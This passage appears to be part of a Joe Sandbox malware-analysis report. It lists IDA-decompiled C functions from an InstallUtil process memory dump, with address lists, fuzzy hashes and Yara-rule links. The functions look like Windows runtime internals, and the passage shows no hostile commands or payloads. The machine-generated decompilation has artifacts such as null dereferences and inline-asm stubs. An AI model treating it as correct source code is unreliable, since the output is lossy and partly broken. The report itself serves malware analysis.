						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0135b8d9
0x0135b8e4
0x00000000
0x0135b8e6
0x0135b8f3
0x0135b8f5
0x0135b8f5
0x0135b8f8
0x0135b920
0x0135b924
0x0135b936
0x0135b939
0x0135b93d
0x0135b948
0x0135b9a0
0x0135b9a0
0x0135b9a4
0x0135b9bf
0x0135b9c4
0x0135b9c6
0x0135b9cd
0x0135b9d1
0x0135bad4
0x0135bad8
0x0135bada
0x0135badc
0x0135badc
0x0135badf
0x0135bae0
0x0135bae2
0x0135bae4
0x0135baec
0x0135baee
0x0135baf0
0x0135baf0
0x0135baec
0x0135bafb
0x0135bafc
0x0135bafe
0x0135bb01
0x0135bb01
0x00000000
0x0135bb06
0x0135b9d7
0x0135b9db
0x0135b9db
0x0135b9de
0x0135b9de
0x0135b9e4
0x0135b9e7
0x0135b9ea
0x0135b9ec
0x0135b9ef
0x0135b9f3
0x0135ba1b
0x0135ba1b
0x0135ba23
0x0135ba24
0x0135ba27
0x0135ba2a
0x0135ba2b
0x0135ba2e
0x0135ba30
0x0135ba37
0x0135ba3f
0x0135ba9c
0x0135baa2
0x0135bb13
0x0135bb15
0x0135baae
0x0135baae
0x0135bab3
0x0135bab5
0x0135baba
0x0135bac8
0x0135bac8
0x0135baba
0x0135bacd
0x0135bacf
0x00000000
0x0135bacf
0x0135bb1a
0x00000000
0x0135bb1c
0x0135baa7
0x0135bb11
0x00000000
0x0135bb11
0x0135baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0135ba41
0x0135ba41
0x0135ba41
0x0135ba58
0x0135ba5d
0x0135ba62
0x00000000
0x00000000
0x0135ba64
0x0135ba67
0x0135ba68
0x0135ba69
0x0135ba6c
0x0135ba6f
0x0135ba71
0x0135ba78
0x0135ba80
0x00000000
0x00000000
0x0135ba90
0x0135ba90
0x0135ba97
0x00000000
0x0135ba97
0x0135b9f5
0x0135b9f7
0x0135b9f7
0x0135b9fa
0x0135ba03
0x0135ba07
0x0135ba0c
0x0135ba10
0x0135ba17
0x00000000
0x0135b9f7
0x0135b9a6
0x0135b9a8
0x0135b9af
0x0135b9b3
0x00000000
0x00000000
0x0135b9b9
0x00000000
0x0135b9b9
0x0135b94d
0x0135b98f
0x0135b995
0x0135b999
0x0135b960
0x0135b967
0x0135b968
0x0135b96a
0x00000000
0x0135b96a
0x0135b99b
0x0135b99e
0x00000000
0x00000000
0x00000000
0x0135b99e
0x0135b951
0x0135b954
0x0135b95a
0x0135b95e
0x0135b972
0x0135b979
0x0135b97d
0x0135b97f
0x0135b980
0x0135b982
0x0135b984
0x00000000
0x0135b984
0x00000000
0x0135b926
0x00000000
0x0135b926

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b054fff3aee8d874066e987d72683d0cb5fbb1621bae272e39ae8c5f913c4f
Instruction ID: b832fc79b41e5d65fd7b8af6e3fcb948de64954e253ab52e5df33c69a0bbea8c
Opcode Fuzzy Hash: c1b054fff3aee8d874066e987d72683d0cb5fbb1621bae272e39ae8c5f913c4f
Instruction Fuzzy Hash: E271FE32200706EFE7728F19C845F66BBF6EB40B28F154528EA598B6E5DB71E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01346DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01346DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01346B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E012E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01309AE0();
					_t87 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0134795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0134795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0134795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0134795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L012E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01346B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01346B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01346B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01346B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E012E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01309AE0();
								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L012E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L012E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L012E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L012E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01346dd4
0x01346dde
0x01346de1
0x01346de3
0x01346de6
0x01346de9
0x01346dec
0x01346def
0x01346df2
0x01346df5
0x01346dfe
0x01346e04
0x01346e09
0x01346e0d
0x01346e18
0x01346e1b
0x01346e22
0x01346e2d
0x01346e30
0x01346e36
0x01346e42
0x01346e4d
0x01346e50
0x01346e55
0x01346e5c
0x01346e6e
0x01346e5e
0x01346e67
0x01346e67
0x01346e73
0x01346e74
0x01346e77
0x01346e7c
0x01346e7d
0x01346e8e
0x01346e93
0x01346e9c
0x01346ea8
0x01346eab
0x01346eac
0x01346eb3
0x01346ecd
0x01346edc
0x01346ee2
0x01346ee5
0x01346ef2
0x01346efb
0x01346f01
0x01346f06
0x01346f0b
0x01346f11
0x01346f1a
0x01346f22
0x01346f26
0x01346f26
0x01346f33
0x01346f41
0x01346f44
0x01346f47
0x01346f54
0x01346f65
0x01346f77
0x01346f7c
0x01346f82
0x01346f91
0x01346f99
0x01346fa3
0x01346fae
0x01346fae
0x01346fba
0x01346fbb
0x01346fbc
0x01346fc1
0x01346fc2
0x01346fd3
0x01346fd8
0x01346fd8
0x01346fdf
0x01346fe8
0x01346fee
0x01346fee
0x01346ff5
0x01346ffb
0x01346ffb
0x01347004
0x00000000
0x0134700a
0x01347004
0x01346eb3
0x01346e9c
0x01347015

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 8c75664ae6c1d853848036535b4a763d5eb31f7a29f55ec73759f727b1b25a8f
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 96716CB1A0020AEFDB11DFA9C984EEEBBF9FF48714F144169E505E7250DB30AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012F2AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x13b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x13b8208; // 0x13b8207
				_t8 = _t57 + 0x13b8208; // 0x13b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x13b8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x13b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x13b6d5c; // 0x7fb00654
							_t72 =  *0x13b6d5c; // 0x7fb00654
							_t75 =  *0x13b6d5c; // 0x7fb00654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x13b6d5c; // 0x7fb00654
							_t84 =  *0x13b6d5c; // 0x7fb00654
							_t87 =  *0x13b6d5c; // 0x7fb00654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0130F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x012f2ae4
0x012f2aec
0x012f2aef
0x012f2af4
0x012f2af7
0x012f2afd
0x012f2b92
0x012f2b92
0x012f2b97
0x012f2b9c
0x012f2b9c
0x012f2b03
0x012f2b06
0x012f2b09
0x012f2b09
0x012f2b0f
0x012f2b15
0x012f2b15
0x012f2b1b
0x012f2b1e
0x012f2b21
0x012f2b26
0x012f2b29
0x012f2b81
0x012f2b84
0x012f2c0e
0x012f2c15
0x012f2c24
0x012f2c24
0x012f2b8a
0x012f2b8a
0x012f2b8a
0x012f2b8a
0x012f2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x012f2b4a
0x012f2b4a
0x012f2b4d
0x012f2b53
0x00000000
0x00000000
0x012f2b55
0x012f2b58
0x012f2bb7
0x01335d1b
0x01335d37
0x01335d47
0x01335d53
0x012f2bbd
0x012f2bbd
0x012f2bbd
0x012f2bb7
0x012f2b5d
0x012f2c2f
0x01335d5b
0x01335d77
0x01335d87
0x01335d93
0x012f2c35
0x012f2c35
0x012f2c35
0x012f2c2f
0x012f2b65
0x012f2b9f
0x012f2ba2
0x012f2b67
0x012f2b67
0x012f2b69
0x012f2b6b
0x012f2b6e
0x012f2bc9
0x012f2bcc
0x012f2bcf
0x012f2bd4
0x012f2bd6
0x012f2bd6
0x012f2bdb
0x012f2c02
0x012f2c05
0x012f2c07
0x00000000
0x012f2c07
0x012f2be0
0x012f2c00
0x012f2c3f
0x012f2c3f
0x00000000
0x012f2c00
0x012f2be5
0x012f2be7
0x012f2bec
0x012f2bf4
0x012f2bf6
0x00000000
0x012f2bf6
0x012f2b70
0x012f2b76
0x012f2b2b
0x012f2b2b
0x012f2b2d
0x012f2b2f
0x012f2b32
0x012f2b35
0x012f2b3a
0x00000000
0x012f2b40
0x012f2b43
0x012f2b45
0x012f2b47
0x012f2b4a
0x012f2b4d
0x012f2b53
0x00000000
0x00000000
0x00000000
0x012f2b53
0x012f2b78
0x012f2b78
0x012f2b7b
0x012f2b7e
0x00000000
0x012f2b7e
0x012f2b76
0x012f2ba5
0x012f2ba5
0x012f2ba8
0x012f2bad
0x00000000
0x00000000
0x012f2baf
0x012f2baf
0x012f2bc2
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfd094351e9277c52d3fee827cae0be5ab0a8e695289df2c0885eda1d28ef9c
Instruction ID: 778527a73a2e038713042e09ac364bcf19512d60e9ccba664b3a3bf7f19cd768
Opcode Fuzzy Hash: ddfd094351e9277c52d3fee827cae0be5ab0a8e695289df2c0885eda1d28ef9c
Instruction Fuzzy Hash: 5551B076A20119CFCB14CF1CC491ABDB7B5FB89700B16846EEE46AB355E734EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0138AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0138AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0138C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0138ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0138FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0138EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E012E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01381608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01391536(0x13b8ae4, (_t74 -  *0x13b8b04 >> 0x14) + (_t74 -  *0x13b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0138C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0138A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0136CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0138ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0138ae44
0x0138ae4c
0x0138ae53
0x0138ae55
0x0138ae5c
0x0138ae64
0x0138ae68
0x0138ae75
0x0138ae75
0x0138ae78
0x0138ae7a
0x0138ae7c
0x0138ae7f
0x0138aea8
0x0138aeab
0x0138aead
0x00000000
0x00000000
0x0138aeb3
0x0138aeb8
0x0138aebb
0x0138aebd
0x00000000
0x0138ae81
0x0138ae88
0x0138ae8f
0x0138ae9b
0x0138ae96
0x0138ae96
0x0138ae96
0x0138aea0
0x0138aea3
0x0138aebf
0x0138aebf
0x0138aec3
0x0138aec9
0x0138af0d
0x0138af14
0x0138af3d
0x0138af3d
0x0138af41
0x0138af44
0x0138af67
0x0138af67
0x0138af6a
0x0138afca
0x0138afd1
0x00000000
0x0138afd1
0x0138af6c
0x0138af6d
0x0138af75
0x0138af7c
0x0138af7e
0x0138af80
0x0138af85
0x0138af87
0x0138af99
0x0138af89
0x0138af92
0x0138af92
0x0138af9e
0x0138afa1
0x0138afa3
0x0138afa9
0x0138afb0
0x0138afb2
0x0138afb4
0x0138afbc
0x0138afbc
0x0138afb4
0x0138afb0
0x00000000
0x0138afa1
0x0138af4f
0x0138af57
0x0138af5c
0x0138af5e
0x00000000
0x00000000
0x0138af60
0x0138af64
0x0138af64
0x00000000
0x0138af64
0x0138af1a
0x0138af25
0x00000000
0x00000000
0x0138af27
0x0138af28
0x0138af33
0x00000000
0x0138aed0
0x0138aed0
0x0138aed2
0x0138aee1
0x0138aee4
0x00000000
0x00000000
0x0138aee6
0x0138aeec
0x00000000
0x00000000
0x0138aefb
0x0138af07
0x0138afd3
0x0138afdb
0x0138afdb
0x00000000
0x0138af07
0x0138aed6
0x0138aed8
0x0138aedf
0x00000000
0x00000000
0x00000000
0x0138aedf
0x0138aec9

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e155dc738fd533af040f6207aaf4c4349f564248c626637791cc386492c9f31
Instruction ID: 0999e850dd4f39f05870258f7747b5b809a7ee1fc57d15096c95aafad44bc66b
Opcode Fuzzy Hash: 4e155dc738fd533af040f6207aaf4c4349f564248c626637791cc386492c9f31
Instruction Fuzzy Hash: CA4117B17043119BE726EB2DCC84B3BBB99EF84628F04461AF95AC76D0D774E805D690

Uniqueness

Uniqueness Score: -1.00%

Function 012EDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E012CCC50(E012C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E012E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01398ED6(_t102, _t98);
						}
						_t76 = _v44;
						E012E2280(_t58, _v44);
						E012EDD82(_v44, _t102, _t98);
						E012EB944(_t102, _v5);
						return E012DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x13b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x13b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x13b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x13b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x138fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x012edbe9
0x012edbf2
0x012edbf7
0x012edbf9
0x012edbfc
0x012edc00
0x012edc03
0x012edc14
0x012edd54
0x012edd54
0x012edd54
0x012edc18
0x012edc1d
0x012edc1d
0x012edc32
0x012edc3b
0x012edc3e
0x012edc46
0x012edd5b
0x012edd62
0x012edd64
0x012edd67
0x012edd69
0x012edd6b
0x012edd6e
0x012edd70
0x012edd73
0x012edd73
0x00000000
0x012edc4c
0x012edc4e
0x01333ae3
0x01333ae8
0x01333aea
0x012edce7
0x012edce9
0x012edcec
0x012edcee
0x012edcf0
0x012edcf3
0x012edcf5
0x01333af2
0x01333af5
0x01333af5
0x012edd06
0x012edd08
0x012edd0b
0x012edd12
0x01333b08
0x012edd18
0x012edd18
0x012edd18
0x012edd20
0x012edd23
0x01333b16
0x01333b16
0x012edd29
0x012edd2d
0x012edd36
0x012edd40
0x012edd51
0x012edd51
0x012edc54
0x012edc59
0x012edc59
0x012edc5e
0x012edc5e
0x012edc63
0x012edc66
0x012edc6b
0x012edc78
0x012edc7b
0x012edc81
0x012edc81
0x012edc83
0x012edc89
0x00000000
0x00000000
0x012edd7b
0x012edd7b
0x012edc8f
